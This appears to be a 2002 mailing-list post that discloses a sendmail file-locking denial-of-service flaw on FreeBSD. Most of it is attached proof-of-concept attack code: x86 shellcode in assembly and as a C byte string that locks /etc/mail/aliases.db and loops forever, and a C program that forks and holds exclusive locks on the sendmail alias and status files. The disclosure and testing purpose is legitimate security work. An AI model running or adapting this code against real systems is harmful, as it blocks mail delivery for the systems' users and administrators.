A problem has been identified in sendmail that can result in a denial of
service attack. Attached is proof of concept code for this issue.

http://www.sendmail.org/LockingAdvisory.txt

have a safe Memorial Day folks.

-KF

;
; Safemode.org, written by zillion 2002/05/24
; http://www.snosoft.com : zillionsnosoft.com
; http://www.sendmail.org/LockingAdvisory.txt
;

BITS 32

jmp short callit

doit:

pop esi
xor eax,eax
mov [esi + 20],al
push eax
push esi
mov al,5
push eax
int 0x80

push byte 0x2
push eax
mov al,131
push eax
int 0x80

; Where going to stay forever ;-)

sub cl,0x3
l00p:
js l00p

callit:
call doit

db '/etc/mail/aliases.db'

/*

FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db
Written by zillion (at http://www.safemode.org && http://www.snosoft.com)

More info: http://www.sendmail.org/LockingAdvisory.txt

*/

char shellcode[] =
        "\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80"
        "\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1"
        "\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c"
        "\x69\x61\x73\x65\x73\x2e\x64\x62";

int main()
{
 
  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

#include <fcntl.h>
#include <unistd.h>

/*

Stupid piece of code to test the sendmail lock vulnerability on
FreeBSD. Run this and try sendmail -t on FreeBSD for example.

More info: http://www.sendmail.org/LockingAdvisory.txt

zillion (at safemode.org && snosoft.com)
http://www.safemode.org
http://www.snosoft.com

*/

int main() {

  if(fork() == 0) {

    char *lock1 = "/etc/mail/aliases";
    char *lock2 = "/etc/mail/aliases.db";
    char *lock3 = "/var/log/sendmail.st";

    int fd;
    fd = open(lock1,O_RDONLY);
    flock(fd,0x02);

    fd = open(lock2,O_RDONLY);
    flock(fd,0x02);

    fd = open(lock3,O_RDONLY);
    flock(fd,0x02);

    /* We are here to stay! */

    for(;;) {}

  }
}

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]